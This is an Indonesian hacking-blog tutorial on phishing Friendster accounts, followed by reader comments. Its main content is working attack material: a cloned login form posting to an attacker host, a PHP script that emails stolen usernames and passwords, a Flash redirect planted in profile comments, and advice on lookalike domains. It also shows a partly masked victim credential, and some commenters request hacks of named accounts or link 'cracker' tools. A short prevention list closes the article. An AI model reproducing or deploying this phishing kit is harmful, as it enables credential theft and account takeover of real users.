Home / Hacking / Phising – Hack Friendster
frinds

Phising – Hack Friendster

D

Hasil capture FS orang lain hehehe FS siapa yah ? mohon maaf kalo yg punya lihat, tolong diganti passwordnya :)

Dalam komputer, istilah bahasa Inggris phishing adalah suatu bentuk penipuan yang dicirikan dengan percobaan untuk mendapatkan informasi sensitif, seperti kata sandi dan kartu kredit, dengan menyamar sebagai orang atau bisnis yang terpercaya dalam sebuah komunikasi elektronik resmi, seperti e-mail atau pesan instan. Istilah ini muncul dari kata bahasa Inggris fishing (’memancing’),dalam hal ini berarti memancing informasi keuangan dan kata sandi pengguna. Oleh : http://id.wikipedia.org/wiki/Phishing.

Sedangkan menurut saya Phishing sendiri mempunya arti menyamarkan sesuatu yang asli dengan yang palsu, sehingga yang palsu benar-benar mirip dengan yang asli, dengan tujuan penipuan. Kasus Phishing pernah terjadi di Official Web site BCA Online, hingga sekarang yaitu FS.

Pembahasan ini sudah dijumpai dibanyak blog-blog namun pada umumnya hanya memberikan sedikit sekali gambaran bagaimana proses phishing itu terjadi, apabila tidak hati-hati maka account kita + passwordnya akan diketahui oleh orang lain.
Baiklah sekarang akan saya berikan gambaran mengenai Phishing di FS, dalam proses Phishing di FS ada beberapa hal yang harus diketahui(versi saya), yaitu :

1. Manajemen File URL.
2. Pemahaman Form HTML.
3. mail() command di PHP.
4. Pemahaman Redirection.
5. Kreatifitas difakename URL.

5 hal tersebut merupakan faktor wajib yang harus diketahui sebelum melakukan Phishing, mengapa karena 5 komponen dasar tersebut menentukan berhasil/tidaknya sebuah Phishing, saya jelaskan fungsional 5 komponen tersebut.

1.Manajemen File URL.

Pentingnya manajemen File Url adalah dimana proses pemalsuan sebuah form yang asli ke yg palsu/yg akan kita gunakan, haruslah benar” sama modelnya/bentuknya sehingga orang lain bila tidak sangat teliti akan terkecoh bahwa form yang ada dimonitornya adalah asli, bila menggunakan Mozilla Firefox anda bisa mencuri form Login FS dengan menggunakan perintah : File > Save Page As > Filename isi “index.htm” > dan Save as Type “Web page, complete”. Tujuan dari penyimpanan file login tersebut adalah untuk membuat Login FS vesi Fake-nya, setelah kita simpan, kemudian kita rubah form actionnya seperti penjelasan no 2. Kemudian semua file tadi kita Upload ke Free Hosting kesukaan kita, saya menggunakan http://www.ripway.com -> ( http://h1.ripway.com/friendsterid ). Alamat diatas modelnya sama persis dengan Form login FS sehingga jika kita tidak teliti sangat berbahaya, yang membedakan adalah slide foto tidak berubah jika di refresh, dan juga tanggalnya, dan perhatikan source htmlnya khususnya dibagian <form>.

2. Pemahaman Form HTML.

Form HTML merupakan komponen dasar untuk mengirim informasi calon korban yang perlu dipamahami adalah komponen <form>,<input> komponen <form> mempunyai sub komponen yaitu “method” dan “action”, dimana action sangat menentukan proses Phishing yang akan kita lakukan, dan untuk <input> penting pada komponen “name” di FS input ada 2 sub komponen penting pembawa bencana :), yaitu “email” dan “password” dimana “email” adalah id login si calon korban, script dibawah ini adalah contoh kutipan form yang saya gunakan untuk Phishing di FS.

index.htm, form yang di edit untuk phishing

<form name="login_form" method="post" action="http://fakename.com/login.php">
Email: <input name="email" maxlength="100" size="22" alt="Email Address"
tabindex="1" style="width: 200px ! important;" value="" type="text">
Password: <input name="password" maxlength="10" size="22" alt="Password"
tabindex="2" style="width: 200px ! important;" type="password">
<td><div class="loginButton"><input value="Log In" tabindex="3" type="submit">
</form>

Yang saya rubah pada bagian “action” saja, diarahkan ke file penyetor password (login.php versi kita)yang nantinya dikirim ke e-mail kita menggunakan aplikasi PHP.

3. Function mail() di PHP.

Saya pilih opsi ini karena mudah menggunakannya, ada opsi lain misal store database, namun tambah ribed nantinya anda harus membuat database untuk memasuk kan email dan password korban, dan jika mencari free hostingan php yang support ke database agak sulit :), lebih baik lagi jika anda mempunyai hostingan yang bayar dan support ke database plus function mail(), langsung saja, kita harus me ngetahui fungsi ini karena pada saat si target login di fake FS kita, maka disinilah password dan user name di setor ke kita, dengan menngunakan fungsi mail() di php password dan user di setor ke alamat e-mail kita, disini nama file yang digunakan adalah “login.php” file tersebut kita tempatkan di hostingan milik kita(baik yg free / bayar, pastinya harus support mail(), silahkan anda coba” terlebih dahulu, atau baca howto mail() function di php manual), script dibawah ini yang saya gunakan untuk mengirim user dan password sitarget ke e-mail saya:

login.php, store user + password ke e-mail
<?
$id=$HTTP_POST_VARS['email'];
$pass=$HTTP_POST_VARS['password'];
$isi=”id: $id | password: $pass”;
$to = ‘emailkita@fakename.com’;
$subject = ‘Friendster Trap :)’;
$message = $isi;
$headers = ‘Rejeki FS :)’;
mail($to, $subject, $message, $headers);
?>

Sangat sederhana :) namun mematikan, jika ada yang login di fake FS kita maka user dan password akan dikirim ke “emailkita@fakename.com” dan kemudian halaman ini akan di redirect ke http://www.friendster.com”, akan kita bahas nanti mengenai redirect.

4. Pemahaman Redirection.

Redirection merupakan proses pemindahan halaman web secara otomatis/manual menggunakan script, script pertama redirection yang harus anda tahu adalah Redirection dari FS ke Fakefs kita, jadi option ini bisa menggunakan opsi manual dan otomatis, opsi manual bisa menggunakan gambar yang menarik sehingga jika kita klik gambar tersebut akan mengarah ke Fakefs kita, dan jika sudah ter klik dan target mengisikan login dan passwordnya di Fakefs kita, berhasil sudah cara ini, jika menggunakan opsi otomatis, yang saya gunakan adalah script di Flash berupa action script GetURL(”url”,”type”,”method”);, pada aplikasi flash jika kita menggunakan GetURL maka otomatis pada saat load animasi kita yang di dalamnya sudah disusupi GetURL maka halaman FS akan di redirect ke Fakefs kita (contoh : http://www.friendster.com/kuyamudik ). Jika halaman FS disamping kita buka menggunakan IE maka otomatis akan di redirect ke halaman Fakefs, karena di ditesti FS tersebut sudah ada file flash yang meredirect dari FS ke Fakefs, perhatikan address barnya, dan opsi ini berlaku jika menggunakan IE, jika pada Mozilla Firefox tidak berlaku, kecuali menggunakan type _blank.

Action Script yang saya gunakan di Flash:
press-fs.swf, file animasi disusupi action script redirection

getURL("http://friendster-id.cjb.net","_self","get");

Redirection ke 2 berada di file login.php dimana Email login dan password di kirim ke e-mail saya, karena menggunakan koneksi IIX, redirection ini tidak akan terasa, tau-tau anda sudah ada di halaman FS anda sendiri, padahal setelah anda login untuk ke 2 kalinya anda sudah terjebak, berikut script redirection ke 2 yang saya gunakan:

login.php, file pengirim Email login FS + password ke email saya

<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://www.friendster.com">
<?
$id=$HTTP_POST_VARS['email'];
$pass=$HTTP_POST_VARS['password'];
$isi=”id: $id | password: $pass”;
$to = ‘emailkita@fakename.com’;
$subject = ‘Friendster Trap :)’;
$message = $isi;
$headers = ‘Rejeki FS :)’;
mail($to, $subject, $message, $headers);
?>

5. Kreatifitas Fakename URL.

Bagian ini juga sangat mendukung suksesnya Phishing di FS, atau disebut dengan kreatifitas membuat domain palsu / alamat palsu untuk Fakefs kita, saya sendiri menggunakan Fakefs domain http://www.friendster-id.cjb.net dengan bantuan cjb setidaknya alamat depan fakefs tersebut sudah sama dengan FS nya, disini anda dituntun mencari yang bagus untuk Faking domainnya, sehingga orang akan tertipu jika hanya melihat pada bagian tampilan saja :).

Rule Phishing FS, menurut gaya saya :).

[Target]->[Buka dan Login FS]->[Lihat testi teman yang terinfeksi Redirection] |– [Jika menggunakan Mozilla Firefox, halaman gagal di redirect]->[Gagal]->[X] |– [jika menggunakan IE, halaman akan di redirect ke Fakefs]->[Login di Fakefs] ->[Email + Password di rekam & dikirim ke email saya]->[diredirect ke FS semula] ->[Phishing FS sukses].

Sederhana sekali bukan? :).

Komponen-komponen yang saya pakai:
1. Freehosting di : http://www.ripway.com

(http://h1.ripway.com/friendsterid) Sebagai tempat menyimpan file FS palsu/Fakefs yang sudah saya modif di bagian formnya.
2. Freedomain : http://www.cjb.net (http://www.friendster-id.cjb.net)

Fake URL yang mirip dengan http://friendster.com, dan bila dibuka isinya adalah file yang ada di ripway.com
3. Hosting PHP :

Hostingan yang support dengan function mail() yang digunakan untuk eksekusi pengiriman email dan password si target, disini saya gunakan login.php, atau anda akan menggunakan aplikasi database, silahkan saja, atau write() terserah kreasi anda sekalian :).

4. File Redirect :

Saya menggunakan Flash, karena option otomatis redirectnya :), hanya kelemahannya di Firefox tidak mempan :), file ini nantinya akan disertakan di testi target.

5. Email :

Alamat email untuk store email dan password target.

Contoh FS di comment/testinya sudah terkena Phishing :
http://www.friendster.com/kuyamudik

Contoh hasil target yang sukses terkirim di email saya:
± From Date Subject
============================================
± Nobody 10:16 am Friendster Trap :)
± Nobody 7:37 am Friendster Trap :)
± Nobody Mon, 10:37 pm Friendster Trap :)
± Nobody Mon, 10:25 pm Friendster Trap :)

Jika dibuka isinya:
=================================================
Rejeki FS :)

id: sapoedjagad@hotmail.com | password: s******t

PENCEGAHAN

Ada beberapa Opsi yang harus kita perhatikan untuk FS ini, diantaranya:

  1. Biasakan membuka FS menggunakan Mozilla Firefox :).
  2. Matikan option auto approve, di FS kita karena jika ini tidak dilakukan maka bisa saja teman mengirim comment yang mengandung Phishing :). Option -> Approve comments automatically: Pilih “Never”.
  3. Teliti jika ingin login lihat URL nya, jika bukan dari http://friendster.com maka jangan berani-berani login, close saja, dan buka http://friendster.com.

Hanya opsi tersebut yang dapat saya sampaikan, sering-sering cek menggunakan 2 Browser lebih bagus.

Artikel ini saya tulis karena iseng saja, ingin ngebajak FS temen hehe :D dan gunakan sebagai informasi yang positif, jika ada yg menyalahgunakan isi diartikel ini penulis tidak bertanggung jawab.

Isi jika E-Mail dibuka :D

Salam manis,

Note : ada beberapa link yang sudah miss, karena host di site gratisan :)

Hide “Phising Friendster (FS)”

About Artikel

Check Also

hacking-ruby-programming-binushacker

Hacking dan Tuning Ruby Programming

Hacking and Tuning Ruby Programming Hacking Ruby Guidance Daftar Isi Materi Beberapa bab masih dalam …

37 comments

  1. sudha ndak berlaku lagi oom…
    itu udah diblok ame FS, dak bisa masukin testi Flash.

  2. itu script lama bos, yang baru ada di gw neh… gimana mo upload nya ke website binushacker ya?

  3. Kasi dah, masih efektif kok di fake friendster!

    ^_^

    Just little edit code..

  4. bang ngimanasih cara buka sript js orang yang udah di lock….
    ketika saya buka link js nya yang keluar malah tulisan nga’ karuan lhooo….
    mohon petunjuk nyaaaaa…
    pleaseeee……….

  5. mas…
    bngung ne…

    file

    di save,ksh nma login.php,trus di upload ke ripway gk???to cman file index.htm aj yg di upload??,trus yg di sisipin ke file gmbar animasi script yg mna???
    please dong bntuin….
    reply k e-mail saya aj ya mas…

  6. mas saya udah save halaman login FS dengan nama indeks.htm
    saya juga udah bikin id di ripway.com dan sudah menguplod file
    index.htm ini ke blog saya…
    yg di edit di FS itu yg mana ya mas… jika saya mau edit lagi file index.htm yg saya upload tadi mas..
    makasih mas..

    mas address http://h1.ripway.com/friendsterid ko gak bisa di buka ya mas.. tolong donk kasih contoh lagi mas..
    supaya saya tau maksud nya phising itu sebenarnya mas..
    tampilan login nya giman…
    makasih banyak sebelum nya mas..
    kirim ke email saya juga bisa mas…

  7. ak gag ngrti .
    bantu’n dun,

  8. waa…
    dah ngg ampuh lagi to kk Utuh…
    Plizzz updatean script na yg baru dunk…
    kekeke kekekeke..
    Klo ada yg baru kirim ke email aku ya kk..

  9. bang, add fs merry ya m3rry4ngel@yahoo.com
    btw, script na koq nggak bisa di pake lagi,
    merry coba ngg success nich^*
    mohon bantuan na**

  10. tolong di perjelas cara”nya,
    seperti udah from,free hosting.
    thx

  11. mass…

    gmn klo bnerin fs yang terkena phisng tsebut….

    kok jadi tulisannya gag karuan….
    kaya html gethoo…

    plz di blz…

  12. mau tanya donk
    klo aku view profile fs ku lgsg ke direct ke profile orang lain
    ada cara untuk ngebenerinnya ga y?
    penasaran nih..

  13. itu mah…. mancing ikan,… hahaha… gak capek nunggu ada yg login kah,..? hahaha ya klo ada klo gak,..? Mau tau cara yg lebih hacking & menantang..? Mari bermain logika, Logikanya gini… kalau pencuri mau curi barang dirumah orang, pasti jarang yg lewat pintu depan,.. kenapa,..? karena selain kunci depan biasanya lebih kuat, juga resiko ketauan orang tinggi,… jalan lain adalah lewat jendela atau pintu belakang, yg kadang malah lupa dikunci ama penghuninya. Hal ini pula yg terjadi pada setiap rumahweb/homepage/website/ tanpa kecuali http://www.friendster.com... masa iya… gimana caranya,..? gak percaya..kan didalam friendster berdiri programer2 hebat,…? full security….dst.. hahahha… jawabnya selalu ada kelemahan diatas kekuatan super sekalipun…Kecuali kekuatan Tuhan. Truss gimana caranya…? sabar……. jgn buru2…. santai aja, pikirkan dulu tentang logika yang aku buat diatas,… Kalau kamu pinter.. pasti bisa, Kalau gak bisa2 juga,… kirim email ke aq. kukasih tau caranya… bukanya ngeribetin kalian tapi aku cuma mau lihat kalian usaha dulu hehehe… seppp anda pasti bisa.

  14. blueZ_Hackerz_id634

    basi

    basi

    basi

    basi

    basi

  15. ada yang tau script bwt redirect ke fakelogin lewat mediabox gak?
    biasanya aku pke

    di media box,tapi sejak minggu ke 2 januari 2009 ni kok dah g bisa lagi ya dimasukin script tu…ada cara laen gak???

  16. can you hack this?ashinoi@gawab.com

  17. no english translation?>

  18. lieuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuurrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrr

  19. mas buat FB nya mana????

  20. mas ambilin fs ma fb tmend gw dong,.
    url fs’a friendster.com/dhelyna

  21. keren keren mantab lanjut dahh:)

  22. |——————————————————|
    http://img299.imageshack.us/img299/3664/56914665xv2.jpg
    |——————————————————|
    |——————————————————|
    http://www.4shared.com/file/110571116/a4df6048/Friendster_Cracker.html
    |——————————————————|
    50% bisa di bilang peluang..! karena menebak password!!
    setidaknya kawan-kawan kurang bisa gunain tuk ngecrack.
    id frienster orang.! isa juga ngecrak frienster kamu yg
    kelupaan passwordnya..! ihihihihihihihi…………….
    |——————————————————|

  23. http://www.4shared.com/file/110571116/a4df6048/Friendster_Cracker.html
    ===============================================================
    http://www.4shared.com/file/116593137/9707718c/Facebook_Cracker.html
    ===============================================================
    Nih tuk facebook ……………………….!

    NB: 1st instal dahulu jawa runtime nya baru bisa jalan
    machine nya
    =============================================================

  24. Binus Hacker <== serem nmnya hacker,….ini yah hacker??mas hack website/forum forum tau gak mas hacker???saya coba baru 1 kali berhasil mas hacker…..

  25. kak…
    ajarin cara giman buka foto di private di fs dunkz…

    please…

    saya orang awam,,,

    pengen banget lihat foto pacar saya yang di private,,,

    hikz……..

    tolong balas di email saya yah…

  26. bantu aku nyari acc user name plus passnya master neh targetnya http://profiles.friendster.com/clubbnfc kirim ke emailku ya om…

  27. wih pada main FS ya mantap dah 😀

  28. asw temen binushacker…
    mohon bantuannya nih, facebook ane terkena phising dan terlanjur login pake username dan passwordnya…
    permasalahannya, pas udah klik login malah masuk ke http://nokia12.t35.com, sedangkan waktu login pake username dan passwor yg sama di kompie kantor bisa login ko… knp ya??
    mohon bantuan solusinya buat perbaiki koneksi kompie rumah ane…
    thanks bro…

  29. oya bro, mohon bantuannya ya, ane tunggu balesannya di email ane..

  30. Construction Position in todays market are difficult to come by and this is made even more difficult by the fact that future employers are becoming more difficult to satisfy. Personally, I think that the world economy should see substantial improvements within the next fiveyears and this should make everyones financial position easier to manage.

  31. om.. php na itu bisa dipake buat facebook ndk ??

  32. kasih tau cara cek password id ini ya :

    profiles.friendster.com/81782800

  33. kasih tau cara cek password id ini ya :

    profiles.friendster.com/81782800

    via email aku aja ya

  34. Bang belakangan ini ane ada masalah dengan blog ane

    http://vivareloadpulsa.blogspot.com

    kalo dibuka selalu secara otomatis diarahkan ke http://www.ripway.com , entah kalo Abang yang buka, coba aja Bang.Ane benar-benar pusing bang gmn ngatasinya Bang? tolong ya bang…makasih sebelumnya

  35. kakak……….. bntuin yg cjb.net
    bingung

Tinggalkan Balasan

Alamat surel Anda tidak akan dipublikasikan. Ruas yang wajib ditandai *